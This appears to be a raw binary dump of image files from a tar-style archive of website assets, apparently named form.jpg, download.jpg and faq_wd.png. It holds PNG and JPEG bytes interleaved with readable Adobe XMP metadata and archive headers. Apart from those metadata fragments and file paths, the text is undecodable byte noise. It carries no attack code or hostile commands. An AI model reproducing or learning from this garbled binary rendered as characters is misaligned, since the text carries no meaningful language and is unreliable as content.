��K��"aIٺ�\��Xk��Up�4��>˱O����)`�M�l��Yk�Z�U��}�+P4}C{bdfqpbz��~��,۶�b���CY�q�Ӓ.�(�5�R�L�+ش���p)}u��@4,|i��8��r:
����6��pì�g4Nw���%����p�TItj�������;:�/�jE�{�����Җ��r���n�q����\�����A�+v�v�����nY�a��-IuӲ��ڵs�.9;��H/���?�)�)��9~MwG��%Y9��K���֭w�u��	��\r��7^��m7ݑ�fE�>�0��8��K�V����+O��b*��Dtjr*���EA�$h��i���?���G
�q�)��Z����=��(ԅccV6:_�,�~"�p�^��f-=�Y��q��x�ZUj0�1jFq(]"��R�K>31���g'!2DU����t���e��@OK��C��|xހ���Tuܶ8
�������o���5,�>dætM��"��0�yH��WʠT�)\g̓����ݼ�G�9vYg��ΘRSΞ�#��Q$�?Q)�=�%�Y�1�F�H�4�����`����6�hP@:n���f�K�~��Q�h���c�#�;փZ����]Q��Z*VY��§�7�–j�`98�f,{��|v6��ɩx4�H�g�϶D�����1I6�*�˖�(&��C�22<
]I{hQ�U�UU3t��1\�d|���x��z}���q�(��ʊ�Bz�D�V�zӽs�'�7֝�z�E�v���m�%�1�����.�y��{��y���[�—(�r��+�@:�4A�;"8����2<��Z�0��u�up����|����P0Д�OO_�'�%]8	#�Ȓ��H�&�|�����X�C{&�f����f�x{!=�M���Rks�]�Rj�h����jrůT��UK]����B�ܬֿ���K�E�=4�r���S&EWM'I��EN�80�e���c��ȉ�l)�*o�>���Kvs���R,��cl��\Q
4w�`�u���l
�nh��kTu�A&d���-�{��ǖx5L��வ7ڃ�J��D+G6�\�"���u�^	��D�1�p�l���ithP腠��k��sv���T�F0[&|n�l�<���DN�<��q�X2y�{=�Y(�(o�b���9[3�+&^f=>Z�$�4"�"�U�4�Ir��iJ��*����'>]+Lә��^�07>����Iě�*�|WWG,��+���~#FX��g���O�y������Iӡ��ѻ��R�J���8E�kuU���KR���Yʢg�꾭۶��S##�R��ݞY&�����H��~�3Г�€�N�L��ދ�^t���d�P�q�\+Ju@+�9L`K�~�R,]6󅳪��%��M
n���6�e�����#	�/5�,��„�����І�P�<.`���$��j�M�
�M��ϱ���� V�񲤪��	J�|
9vv�����B�n���'�A��1
�0ǦMׄy
�
��ezG�7����-�=6j�Xnij�+��f̵a��l�5��뭆=��o6����l���t��&�e+]f]��%�v�K���[մFΞu����}����E�8|8MlY�.�[�и�x�Ǫ�R(a�T'4�n@��,�I�l#@+�������o���?�/[|�#�I�Z(սif���ږ?���^�M�|����x���n�����!��0A;����4M6�#�k��gax��S�òTM�Eo�&��zM�O�xX�*��uU�`��_k��W���(/��A�TI��B�v.S
`3~K
�w������_?6~�����1�<�P�� �[�8̄�����`|Eس�;ޒ�P[�	��)�%��&X���4��I����5U�	��41`3�xh
�`F�
Y��S^i���`�fJv��I4c�L:��G~�)�#~��t�gkHWNw+�uZ0k�9��r�ė�g�.7�.�u\�t��@�r��D1�\����d6ݿp7Un��
��nl�ݗ
B�FSpO��m�KP|���˯��^� ��;p�8L[<�X�U|AM���ϖJu�6��a5ޜ(�ǚ�S��`��m)�ږ�j</0��MQ�ri��c7��d��?��]��h˽��;��i���"�9���{�O��k�����?z��Wa,�pgOo�R�d�A%I:���Jylj���N��.��( u�6t+��R>���4-�-zĺ���߱�z�)ÑU��DhU<
�B�jR͚[,���IF}��H�'�����W۫x�!X�!q�2
Gm
|�瘖euE��m:�Z׸p����$Y]������CC�����b�BU���6���J���*�����D�[�뼔���$i�q�blx*��S������98#��m�(t�M�XȔf<*��m�J$��������z�������e�v�//�
�D�f�%	��	"%D|A�ćH����H�B @I���`cc�g���3��3�Tw�^����9��vȧ�05Ҩ���W��s��wVO��T�Gjc�'����ꤘ5A�d��*d�s%��\HyTӈ�b�l�vĊAK)F�KCi��\+���gy�K����R�MU#�)�ώ��8
z�%r�;u|��8
����[�V���]���-q�`o��~�r@E��y���[�qlN�x�V;h��*��y~�e�n,�g�L͝x|�~|f�ٗ^���|����ˋ.V��}���o}�_������3s{�f�6F1|N�qtp��m'�r�`	dٯ"�ƍ�ju�,S�pf�cc;[�iuڝ��m�������O�n��Q��gѮ�e�����c���
�U�49�[8��i��1Œ�k8ޙ(k�����;]ukҫ�:��j{g�ys��e6�>�n���=x��?z����W?V�:al��v�{�Z��Fku~�{�G���(H٨eR�]�/����k����f4;Bg��8%(G���ɀ���,�c��	C�*����)]3�Gd��ⲡ#�&P����B��;��I�*Bz��ټ�/���i&��1-|jېP ���J%�T+;��e�h�3��=����>*�[[ղ�y�p9ձ(�4�y�W�lo]k��MN����;���|��i�q��	B ��$zş��^�e��bv�.�`}���~������ǖ���/�YW�Z�//�B�N��V���C�J�u ��p�G�7�,�b����w��~�Ƶ8E��[�kIv��=�V�q��q�㱱u����\A~B�
�m�aN�Pٌ�=��>~��Z�J
L��P����
��jc��뭽�P�:���
Z�
F��V'ʤoj'WW�W^�y�Ś���8�#�r�y��ͽ�מ~W;���0z�o^��[^h�%nw��dT�t����ҏ��m�/���m�R�:8V]3L��k����k4+F�I@�'-�Z��zg�J�ύ;%G�P9H�fF֕�ɬ�o+9rW�[�f�x��D��5pS�<J��w�(����ˢ™ud�]U��H�@"�0
9T�7�T�P�V]?���=6-��(�*ӓS�s�k��!:}�+��3�W�v���ʪ�]Kb¤a1�[EJ�R�ʬgf�;��]f�^K�Kss+���8�b�O=������;�.=
)O��r�>��ws���
�m�U�x"�(�a4�,�9o\Z����*N��->�q4�������Jc�h���|l���[?>������&c,&#����u�1黖�%A��ؙ�<>�0�Q.; ��b�Z�MmO֖�J1jP�K<
X��6�����>cz�kduI�Td�Ad��W,	jo�C���a�\��}f�����.��v�V�|�N�,c�1��45�䔫��,8�R"M�1��1��N�$kqBѡ�@[���\��Z��	e~FMp!0���u[��������D��$��$IyR��-���ؘ��hb��ԶD��JR�Q�����	1??���m+��^��l¯�eIb[3��G��L^~>+<�{ؙ�����ru���b�z�X��(��df~�P~��[:s�J�jH�;#����:��-\����IqD9足�ێ�U�:@f#��a�qEK͝�8��ŵ��������� bJ�'�d����a��}�y�Qs��DݱlfXBf��(�1�0��l�5u�� X���۷���E�������a'e
�F�c�K��8C3�:��D�@^����B"qq���i*�"y���Rl)ŎhLPh�X�/��h�ً+��U�Q�����/p��rJ�*.:�ʀ����|	_��-��N��}��2�qa�!�^���t�\���0\g1�G�aЉ�	���6���i���/����S�<��빗�~�W+I��9��w�ܙ[\&�l��n�]k��*@9����H%�E19c��@����.�J�м�X�鯿�c�u�0�.������±S�N+���� �A
M��4�"��h�h��?}��V/ł��x�$�X�(����8���}8&e4�
�4q
Np�UQ���*\�N��\��R��k-��*��%p�~��w��X�|3�#(�"�}�(Z�Dѽ-8�y,ۻ��o����D��H��g�L�L�)�/�M��T�������O���Tr�p�;�z"�6gj��B�����h*�����=6�R�|�2nmǥ����
N�GI���'R��B���D(��.E�F0R�p����^*�`dz$�Q��w�E�G��J�"�wb��g��8)��p��Fc�ynn��c�/�6����F=-L7z=o�������ի��ހ�ث���ݸn���J
���d1]7�6w7��\>m�uc3�S�\^>�"R�m!� ��$�L�1:�<ǘ����1�{e{�j�8�m;��`�8��2ie$�O.���Q*��A!�����AD蒤�
�p���@��[��	�� %1�l3��ۣQ�Z-2%*D����S�"Wk%,�Dܾ����l5�
F�JH�"�dn�w�Ը���~��W��8H�R�4J�d� ��@ܽA`��J�89�&8�$�N1B�j8P�m�����Z�")�*"AD^���V�y)C�JK����0�BKTk�
�1*'��j�I�
���z%Z��6����#jਅ�i]�gF0b*����H�����b��רWu�{{{7u��6&�&��u������^x�yc��G?�r���xm��7'g�.���_���~��3��v��թ��j�4��{�,�;{�������lrr�+�����������ށa%lj���t%�z�=ɹ�h�^	�liP�hı-���\��8]�5�uUG
*��NA���HJe���<ܘ�Vqc�	��骄�)t���O�~�T2e����_�]+6,�<���0��d�^�
ɨ�h��q�f��+��9��}|�x�y���nu����<I�:��e����4��z�~�j_bF]G�d�sCa�^T�f����$Õ��>�u����7�y^� ��,�4�.U� �OV��FZ���<.`
0~�QFյ`��c�N�ۉҡo��ə�3Ǻ�8�4
-���a��t�RZrl�)�3p�p0�wZ=���d�o�`�~��.�6��2��|�����'VW��n��wvZ1O+Յ�{��cˏ �7/_��ayp��|�+����
c�Q5�[o���4GA8�T&9E��V+�{����>|o�>IWr���-"7k�L��v�޽r���(� $�! 8��@�	����"�`�l�amƻ1��nT^r��'A�ڣH~��DP8@������pXp�o1�Q೩����)(�\�z.%|�)��B��W0���o�+��v�1��m{+~��Ƅn�t0t����
в�ؖWꍢ,d<��($��qK:T,@hI��E[M8���P6�<O����� �B	"f���x䭪F�PbyV�Z�Gӌ}jC��*��*h��B��A�-�Ixx�λ�&kW��ҙ��$<(R�8��2M���({�
�PYӴ� @��kW��O<��l�J�{%Kw�񽧟y���]+��U_�SÃ]Kk)MDK׌�����S����S�>�����S_��Z���G��g�����o^׹<q�bxM�������N]�%ܯ�x6on��J0[��Ȅ���rm�!S�̯�"it:]���
�JĊ�5Gǽe��)�(ˢ��K�$�L�$c�cxE3��� ���E��(���
�3=D�!k��"M��y��0T�w���ܠS��R�7I�
n�Y����U���A�j6[��=b�#Pllܷm�`��V]H�C�q(�A!��LB h$3D	���qX��+2���+ċ����R�x�bM����c��0�?+�EJT�L>
������
^�#d�i�`0���<�]ײ�[f��)80,��$p���&�Q�,~��R��;O����o��ֆY*_9����^gk��� �zA���k��F�;p�`��8]��������mw�S��~��W�SY/}��kKg���`�d�-�"���ph���L��㕲,;�9-O3��p+Xe�Xylp�>�t�N��L�8�i�M��V���f�*��"�D��&�
0��R�uϤR�C��9�)�є��;��\�	�2*)щ2�.�wF�ϕ��EAn��䌣��ߊ"�<��_bp�9`Y��8��Y���o۶�t�Rm�:�h@h�`���t��(�l�Z̎�Vu�(^��L1��-��&d�
@V4�>&�"�Q\sF�*PRm�GM5���4‘ejV�x�&��F#~Fp���Zp�<$�Y���ʨl��0DŽ��p$Db0�Z6~>������Pf�\�p8lL�wv�����.q�
�����?��ff�Wj�$��PGAJ8 W<l`��Z���D�ɭ��F���UV&#�^}����%}b��z��O?=\�ܻ���+��3������k[���-�&��$��i�ܻh�;l��qbaiᰳ���Mx5?C��@"������S�z.g���Ѫ�D-UD'%�=�!������p����r�[�k�@c�@��8I����lq1
NS2�����6���N����[�d�������Fa���ݣ������8Hm
@�z�9�x&1Ӗ���|�_��
%Z�%�Hi�»y�G-�-O˝$j��>9�BZ�+��2Dd\HbAr4�͘]�u^}k �����˂+g��P�7Ji�^K�H��$I
��X�]V�ΰl	�����u�rMv�¥�|��~yc�ƆH��>�
�7���2qri�Z�ʦ]+�XMS6�O�m�>1i���>����0pК�(��.���v�g��x�;�A�_�������U��D6јx��Ơ�J�R%U�M�Y=��x2�`:��^{��LL4L���c.��b�y�O�v5Sy<%7��v����,�#Y�"��RP�?���P�)���� 6C��js ͧ{�
�_��#j��Pp��I�v�̒��� ��H���I��<k�^N�}s� �$�]�G��"!)�H�9A��h�ELb�nZ\r�DBǀ-JY�5.t�X��aqR�3$j싑�Qv4S���������}'Z�|�R~J�1N�b�XS+t�/��(��4S�(�N8�R�q��?8���*{$\����w�z���|�|�������)g���{gd{����6��x4�4��(6���Ҳc�� E]]9��7�8'@D�]]�����.tn�|��{�[x�C�^k�َ1?c�O�r����{O޹����d�t�Ƙ�����1f��,��%�d�n��Qy0^ø���9~}iiz�y��;`�i2�t��oH�� ����^�(�E�7"Wʰ	��\�/��P
�pT�*�?�1՘RӤ��� yN@����޷hAQr���&�p��������(4�c�d�Q
��V?!�ڥ�q�kW�ڣbEa3�)#�%@���!I	����Ƣ`<��.��\b�=�i^�:-�h��<��s@��EOU������ۤ(UĨr��:���GQh�s���OxF�V�M��;�]�t��6,��Y�>p�qF;�W�f�����z��h��Ž�Q/Z�=q���7��}⓿�ӓ���|�ow;�n�'{�ޙ�K̭|��G77^������夵�����bM�/�|i�w�����k/<��S�f?�;��Wja��$�RR�^h5we6�k�%�o�5��M��qM-ٓ�ã8��Ə����즠xg���b�²�l%-C3�u��*��
0���z�-�Xg�a�V�M��8�
�[�-+���7B/�/�W�{
P��!�C��RAɼ���R��X�D��|����]/u����7��gښ����
�$"&F��Q�1uK��bcw�uc�0��J��0ƒq�hT�4��檀��L�#&F@��\�)��+E��58B;�
ѐ+�cdY0�"��<����R:�٢�_�	*��0��[�:g�;�I�D���{�id8�08�?�������R��;��6'��~����w�kﰝ�V��Jfyza�p(�T�/\8����g�qߝ?S��Z�z��)OӾ��/?���6���/�M��<���($i�\^:q,N�kW����߽��+���ÎH�^�S*��4��dY���@�ɩ����Q@7���=<���/���d�[�(�MH6J0�+�11Y�U���7C\�#Je����z��LPt�(����#K2 թT�S ?�V�%ND�E�CJ��'j���ʤTUQ�Q����ߋ>GUNr�\����܈�I���\�3�IEND�B`�featured/images/form.jpg000060400000011634152434416630011266 0ustar00���ExifII*��Ducky<��ohttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:A3A911BB63FEE211BE85CC58F41DD95E" xmpMM:DocumentID="xmp.did:82612CC7FEA211E2B13FD53245E6A1DB" xmpMM:InstanceID="xmp.iid:82612CC6FEA211E2B13FD53245E6A1DB" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B3896DEF8AFEE211B6E2918E98ED105A" stRef:documentID="xmp.did:A3A911BB63FEE211BE85CC58F41DD95E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��Adobed����		





��ql���

!1AQaq���"2Rr��Bs4��#3S�5b��c��$�u�&'	!1AQaq���"2��BRr���b�#4��S�$5��3Cs��?����}�q�UU]�P���P
@(��P
@(��P
@(�x,���h�������Ta-� �E�}4��aw�?H%̰��d�m�9
2���PO����)�ʔ����4���i춫�$Z3�l��k�Z3�r���J�~O�"v�h��H�En�TJu��W��P���9�h�Y+�[Β��H��-�ڮ7{����r]G;���G���^O���x�n�f�w�D��j�Om��RU��n+��y"T[���)�ޗ����d�;Ϥ�̓\8Ӥ
Z�Uŭ9�J���o[�֛R���@}��M:�%����
��d����J�[5�/Ѭc��i+n��G��g��%̟�t\�6�_��QE��uK�]4W��c����o�_�Q��W�Q]��
�}��;^<�����V�h����i͜�?[獩�2�?%k��z���>��7<sd 12$"fl���q�1⪦�-��X�#2i˲�������8�Q�jIhl�ޞ���>t����@('�A��(
�|>j�*�*��T	7��!_*U����˨��h����+Dse�&�D$���t���u������*�|��N:5O.?I��d�#����&��TQSӣԸ��H_fݕ_~��g��[�36����|<Z�v�l;�(�h�H-e%T!l�B֫�֧*l,-=j[i‘��48\��f(�d�	苢�E}�<6z�W$�ʮ��MiZ�3V�U;�OǠ�.s�fK�ؿ��;+,�#�[���Ϡ�ѻں/��Z��J2Mr����J��崾.s�3��ٓ�za��'c��h�f[YΠ�+)�sB"��Խ�O��O�\D!	ZåE�T���G��ԕ+��1�Տ�ҹ�.1�>�i���p8�\����TZ�o	i�F�ܱ�I�=^H��~B�M�jJd�v�@�����,:�Kf�%��I�mQ�e�G�Q�^(�����7l�wع��6w�@(	�1�%M��>h�^9�05y��m��]G)��܃�/��9�}�U:�eY�g<�P��[QQz�+/�>2g�iݳŲ�|S�������RU+_�������VfI�7^S��[tm��16�m�� q,�-������YKr�I
�z��j�����\4f���l0)�[i�mx�"ȁ�g�s�����M�﹟n������q��.�d]O����8��!];�n�N��z9	!�b4����V\��Ɇ"_X�l[�H�}5���,��f��,յ��gx�l�s�@�I.�P
�
������V���<��Ra���-�G���
��vI�ֽ-�����j��.9��x�Em#N�4ۯ�6�>"
	���6V1Q�)plji�N#��vaoV�	9*h��ў��!dH4�h�P5A� ����dB-���:�麷����
��I����T�*NLj�iS�K�Zm%U٪���p�`�1&��)-7 �<ܺ��c��\�/e�Y��Iʐ��k��N)5��-���+��$�?���1Mi��w<,<*���%1���TE��jC-q,(��m`����Qyړ�+�e����ܫ�FP�y܌4�Ύ"����Q]T\i�G;�h[�Uo�|?]���=T�)�d�x�;m�_
j��if�)c_d�d?%ι|@�7������٧����&��k�ܒMJR��r�\·9ܕ8�:�K���63gUV��q�-"��V䬭��(K�2u�&�on{q���\2�q�NR�f?�q�&��,��.�tT^�T[�lf��e(�q5�U�����ё��l�?d=q��I��P�}�(
�l+���7l�oW{��|��_�X����d)�|T8��f�M��m�A]6�Wd�-�z���ڛq���YEv��ڄerXRTи<��Q�"�#A�k�d�����뙯/���)����p�r�6�,27e$�ndb���QE�֎k'r�xi9��.2;��Y/��ݽ��̧)s�2��q��tx���U]1�D��};�R���uJ|4�J=ٛ����Z#_kؖ�Ӡ�������
������_��%��K��aZ��<��$7� Ym\�Mj[�/tUث����<ێ'LR�WM��s)en��qa��
��S1'����ƨ����
�d�t�&�h.��"Z�.[�Tq��b�Ț*,޷7?�W+H�tV��}l�阞�.5W���W���4?�ÒM=m����X�	��Pb}忊���)��}��ڊ�b�!!}<K]⊔&�������n2�(�4T3Ϲp��x�������,Ue-���y��R�����5>$,�3JȀ�
�8b�2T2wY���	|-�����z>��zWV�š�x[�^6Ͷ���s�TH1c���Qu�!p
�y�޻=B�UM�E�%NԞ�����t���Vq����"�=5U�R�_C%���	��
���N6h�=�Ժ���[]j�Q����ωpI���X���i�2��&g�K��[��[p��;Q
�q	��I-[��㖒k�y]��g`��t�p�����0�k|U�WXg#�IQ�GfT��u�]gr��&�=��Z�ak-jpKҖ�r���Da�MP)$1+v�A��O`�q�s~�-as3�(��r�v�*Y�+t�ڵsZ����I2>l��f)z���
�~���G��>��I�&�""�@�\�ݓ��,��y�����mBr�o�>�����A�@fp�*�!������-ޜ;�q�!���uRqR�2��yp0��R�k�~����3�ԹW�����Rz�����ݜ����4�t�M�����~�^�9�S{�/�ϝ�G3�9�2��|S��!ẘ��{�//Z��
��.��8��Y�mC�*+N&�#��ؒ{�*����jo�.cB����S٥6bN''#�aUP
.$*�D$�Y_��A��"�ߕ��kZ��5����+m�v&B$`e�M�hE:������l�}��8��/�-P޶��S�x��4��O�9@�*;��!Ɉ�T��R5�.��T��/y��Tĝq7��='�7�JR�up�i�1�*iqѣ�������\�H�3k�K
�lv*�@�VU���Q���įgm�Z��Dn����0�BI�0�1m@(uь�V=��N ��U�>B�9�i���m��K�������"<5�$C5�Nf�V�W�]%�(�`��ۆ�R-�(2p�U[����ҋF��TzL�G�1.]dbQ�]�0���m��{�5M���VZ�zͣ��s��4Ocݐ�dCu.��­�{���EK����ʼnw%(�
)܅������'Z�K�q<��o~Z}�(�W�W��.��&/�������%�S�qDEߨn�&o;f剨�7��w��Ŝ���Ĵ�7��/R/���/h���P�>	�U�Mѧ�����S��O"ހ��ñ�S��W�@Ho9X����j�Me�¿�U���ݥ�X�P�.�����`IǼ��HUPl�4��]m@c�Fy�8N����Z��/���P
@(Ew�����ոC�Z���N ��Y
���n�*�4Y���s�^�*�P�ِX�l�@y@(��P
@(��o�)�+���P
@(����featured/images/download.jpg000060400000010331152434416630012123 0ustar00�PNG


IHDRi �V�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:51BC201F00B811E3B14BDAB3AA19A8A4" xmpMM:DocumentID="xmp.did:51BC202000B811E3B14BDAB3AA19A8A4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:51BC201D00B811E3B14BDAB3AA19A8A4" stRef:documentID="xmp.did:51BC201E00B811E3B14BDAB3AA19A8A4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��l
MIDATx��[pU������< C@%�H�h�

j���*���2N�Q��Ծlq:S[�:2`��Z[��j'�Btxhi%�
�A	D��gw��son���9������Xyη����ǀ�
 ʃ���%�a���=N�?`�C�K��9*.'�X�zk�ʫ��X+Kd��g�?�s���m������LE=���Pz{�G�&'��IT�^���?�ta���o`��Ȗ'Q�����˒L2�3U�h�5��#��N;���jE*��3	��$�D�~��2�A9_2;�����ћ��ϔ�	�Е@4%�ź��;���͕�v,bL��,�׶���hkF�lP�f���-�U�C$J����<t��~��*2F,t��B������������ߓ��M*i7E,/K��TRi�L��2D�����G���o��4�TŨDSd���~Z��30S���_qk�xX<� �P��>rў�%���*����W
 ��bf��1/������R!1CL��.�0�h(�j���A�U�]��~���A�x�~��\�t���"n���v0�I<��(	�E�x2�47:e��v�ҷ7��W�EZEq��X�R��I�@$��B��MRf��R�2J�,H�mA+�TF!l��	c���?�~�����.����`��9ݨ��biP�
1������/�^�3JX̕JAjV`KT@�SL\� ���0��E��v�|�p�EM/��kY�);X�_ '��[1r�oe�ss��i�1���J�㨀��C���K'4���5+�G�a��K�A}�0e7��G��]���_\G���g�F�}����ɵ��3����B������Q��6��y3.��-_��^]W_4U�I������l�ǩ>`��5p0��:������
���7ԩ�=�x�^���M��s�����O{zS��R�E��x���en��uX��U}�!]�䃘�?,�+��@�gxQ��:�vCC]��G�ԖQ�^m�;��kgØ�=�+��O?�F�]��-|�9�2�	����%��#���\|A����0r�\9��D��G�e2P_3��j�)ڊg������9��y�M#�a�?�
w|�|h����!<tݹ�zy<��]�O���Vs2A�h�hh��[�/��:��Y4o�.�f�GlY��œ���+�sѯx����lY�� �ۊ�X6zׄlV
�&�璷n�-`�|Г���Wr���YW�����e�ig�^��1'������s�0��h^S�7w�o��O{�5s�+���j�@ў�U�G++�[&�������5s��5�vU��f�o��{����/]�!�tީ��2���&��Y/��{l߶[2R��f�o��Jz`6�~�$�@ӏ���6z���G��V�팶>�@�A+M"�s۲+��Ct������v�禬
:�tGR�[�ut��#k��wq&6����@���p�E0�F��e���x�k��k�M�yqbSì(��uC�d����5{D&�đ\۹�7�]x*L<�dT�3���A˱50��*�ڹ'"8�ʲ�t���X��P}2@���[�&	S��d�I������"7�4�1=е��L�7�ͯ��e�:e2�2�)9��l�
cO��턿]��xِ�l�>Bh�{��IԆ�Q��k3���1'pT��&�9�xq9��+�6���'&"*�;�"����VyP"�!�(̝f�/i����Yv�9��Ԩ��SΔ��\�{�1;��
�!�}�<j�췵�9�vBÈZ��W��Kt�߷B�#$�d��뎦+[n�zgd����;kdML8�;�����;�O��s���{��LE�4I�0�]��&��a�o��P�?�j�{��5S,��g�Ѩ6��!vl����s�H1�,���x!�O��Uh�t<��;�`�f�l��U�i���#}b}u%L��t��f-Z+��dmF7��?.� 7���L�-�h�P��e�i�%�O���s�:����Y���ܜ���� }���}�t��x���	�0��q<0e<����5G�@��ØDC3�>���>0���0 ?Ǔ8�F�MQR����%��`��]ױ
�
<�~d�x�'Wm�j^& x�7F|�&h��g�h��n�#	)$�}�^��r�drm:��Z�Œ�~�$����0������gD���7=��k�{/4�خu�Y�z�Xx��Ch[�!}#*ܰ�Mxy�Xp�f�"�8����i�E+�I�7���I�^���m��[���'�Bx�;
W�g�
��1m�q<H=ȃ�0��D@d�Y&��y��zM{�R�{��ߙ�Af���}2X1��{@ȟ��3~x`�S��t�4��K���=r��A��$�9{{!���>R<a�~�%Xc��k�mT`�Ѣ��w;"J�e��w�}�.�V�
q�a8�EL�%�]َ=Pa1W%�M�x��̠��Y)tMdgy
Fۛ1e:<�c�>�q)e�ݱH��q�PVA��1�|�V��A�JhԋJ�b�d�:q�e�H2�G��aZQ�3po�؁.�#�]j�b*�1q�(��m�T,�����L_?N/�MT�6ɹy�,�q����J�h��v��
�	D2Ŧ�'��3I9.��Ў��8�b����!�W�5㘍�\SsK׆�CC�(Ct�7�;?Z 	R�9�HY3���/���Ff��d�����=��F�p���!
���Af��Ș4��9h����P�DS�� @�.bL ����Fp�=�u$�*CH\#��x��HI����hŅq�54�bO�(MP�\�.�Bl���"��VkY%A��[vv�3�ơ����%�?@��-�2
���d���060'���*�4=�����s�ñJI�|t�Mkt&v�`3���A`.��N�Ki���&(�@[5��|��,*v����1�'���uJ?h�B��i$K���P6)�*m��$���#@��v�N@�1c���%y���2%:΢d�ИYOk	�L�m��
)�<�{�S,rLe�)*KhI1Z�ѺƋ੕��JE��PA���/2wD���Bn*�Ƙ��R�
U9)"feV�4��6I�$!��.�,|
�"�X�)�;�B-�߉M�eBJ8Gb
hK8O�; �5��D�[�JA׌�Y��
��?	29���<ؓ�6L�ѡ+"�� �n�ɤRq��|*�t�Z��<�����u��{v@�;K7c�q\��<4���ח~ܪ;|��(�
���En�����H,ȅ�>�vp��[�#��]�܄��IEND�B`�featured/images/faq_wd.png000060400000014776152434416630011602 0ustar00�PNG


IHDR��u�;<tEXtSoftwareAdobe ImageReadyq�e<niTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ba1a0bbd-1eda-3147-94f2-b3ae00a38842" xmpMM:DocumentID="xmp.did:330D79ACDFAC11E5A1D8FD0AD53E0A0F" xmpMM:InstanceID="xmp.iid:330D79ABDFAC11E5A1D8FD0AD53E0A0F" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02CC8E5FDEEF11E5B542ED907CC6C15A" stRef:documentID="xmp.did:02CC8E60DEEF11E5B542ED907CC6C15A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
�5F&IDATx��tT����N&!		���\X���m�-��Y��b�����z�r�+��z��Z�ֺ��,[Z*}�*��Ry��" $���B��k2��ߝ���8���}̓�;�wf�C�̽����/W4%GQ�ˁ�
G(q�pā�
G(L7tt*t�Z
���
B}�Ah���z�==��� ^#.�����{��D"��|hh��p8,����g�x�����TWW�~��3F@/�·΅N���F���B�Ir�z���mY�K�=2z
�*�l�:�-���GX��xݞ˖"W�����EvY%����/����?�9PX'��n�~��{��`��( ؄�~
���p�0G�e���Y�{�O�¡n
}����eZA_.����o��F�3����o@�V�[�,[
�-�+�����PÁB]�@�	���"�!��RNo�ށ".nx������F`<]��ѥ����sP�A8���w8��d�L>��J��s�t������@ PWXX����V�3e)FB��G��v�oBo���V|WUUUVA�A�(�1�Hw"������zޖ�1�b�r
‘�!��5^��P�}L�%I�!(��O�u�����C�U�9M�/��LP�r��箭U�1�#�]!g��)nw,9�"u}���lU.gwCq�׸��j'��,^��G�����.#P|�ʁ.�\�/E(�¥p���z�9a�ۡ�t��p���!j����=�8����M�8�V(·��4�5�p#�.X��a��4i�mP�Ʌ��NZ_�P0 
�S=��y&O����B�w��V����J	+�O@���K�IE5��3���f�
NU�M�"�����v��3(6"�4��n��NVd#Dy��.���(�Н�����W;�l�3�O�E�8�`���zK��r�̸1Cv!�����dj��8�[��d@�ւ�b��B|�I�,ŏ 2+4��`�![?,�F,�(xl�UN�d�`��Bx���z���?�؜N�d�+,�ys�hü*��қ�C�ѩ���OM�a:5�0n_��E�^�2����B�P�5��]H.�+�p+�p|ŖUH�}����`��Xv�
���S�u҆�nj���ss��릹�pI])�TUl��`K�����B�M�|:,��g�-b���}jٍ���wӂ��g=��ro;�n�2��K�lJ��pp�BX���)���)[���@�+��&y��)����0,�;���?5�-ж�!˭[
9��c��J/x��w�3w�l�o�8F'Lve�{��nn��]�A!2�B�,�VC��b%휓�P�F�yk3=}�Ӳ��gq��F�yҚ�_�_C@!�qp{]�n|��|7#�8�/��5鬵U���s�1Zw���k��Wo9B[�Ҹ��tk!\��B^����
+�(�~%P�z���T����I�_�&>v�$=�pʶ�i����-�Ր��\S�E��̆�V�P/�v:�79���=@?����y�n�]�bn
 �Y���VN5w=�B��Bn7.#���⫙�8�[S�X��\ ‘(���F���i��i�)	H`D{)��R�aElWH!����y��iln�7����l(�nh
x�	et� ]\QH��1���ݎ^����G6�Zs7����V�kz"�����+�c�YP\Ky��ȣ�� 3�DcS(Ls����G��	�k��+G%]:����{?h�f�TY�5��`�%DŽ��EF���^J�c3��.^=f�JD٫�%��3�Ƥ���U
